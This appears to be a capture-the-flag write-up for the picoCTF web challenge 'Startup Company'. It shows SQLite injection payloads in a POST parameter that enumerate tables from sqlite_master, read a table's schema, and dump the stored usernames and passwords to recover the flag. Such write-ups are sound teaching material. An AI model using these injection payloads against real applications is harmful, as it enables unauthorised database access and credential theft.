# Startup Company (180)

## Problem

Do you want to fund my startup?

{% embed url="<http://mercury.picoctf.net:5070/>" %}

## Solution

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-7a3229a0c64db2338f6c6ccd09623461651a61d9%2Fe48e746db6734b4faa91e2a7cd354ce9.png?alt=media)

The query probably looks something like:

```sql
UPDATE some_table
SET 
    latest_contribution = <POST.moneys>
WHERE
    user_id = <SESSION.user_id>
```

So we can get information displayed in the green text by manipulating the `moneys=` parameter:

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-ebe6375efb794e9078800992a325891b1fb3a48c%2F69736eaa20634168b28afd74b366f2bf.png?alt=media)

The SQLite version is 3.22.0:

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-d2c3987d980c89c6a5f82b0c91da58fbcb9c25bc%2F71b28b0ba90c4d118356b410cd704bb7.png?alt=media)

### Getting Table Names

`captcha=23&moneys=' || (SELECT GROUP_CONCAT(tbl_name) FROM sqlite_master)`

Note that `GROUP_CONCAT` is required to concatenate all the `tbl_name` values into a single string. Otherwise, we might miss out on some valuable data.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-c935e2eebb87ce05209cbc4a731f27bfa5da3283%2Fbb2a73e36a344a9e9120b9bd82021c73.png?alt=media)

### Getting Column Names

`captcha=53&moneys='|| (SELECT GROUP_CONCAT(sql) FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='startup_users');`

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-bafec562e576b4e40c03fc987077767883b54e59%2Ff6198ce6109f44f1ba1d30543bf9c6ba.png?alt=media)

### Dumping Data

`captcha=36&moneys='|| (SELECT GROUP_CONCAT(nameuser) FROM startup_users);`

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-8985b3dec7d826e40f93252be7f1f3b81d7e2e49%2F3f58fc451ff04cad9192181c09eacc26.png?alt=media)

Indeed, our flag is hidden in the `wordpass` value for the `the_real_flag` user!

`captcha=66&moneys='|| (SELECT GROUP_CONCAT(wordpass) FROM startup_users);`

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-692b97c115bc0226aaff87e0ac27e64e003430ac%2Fae414d1d97154c6998412d1746e9862f.png?alt=media)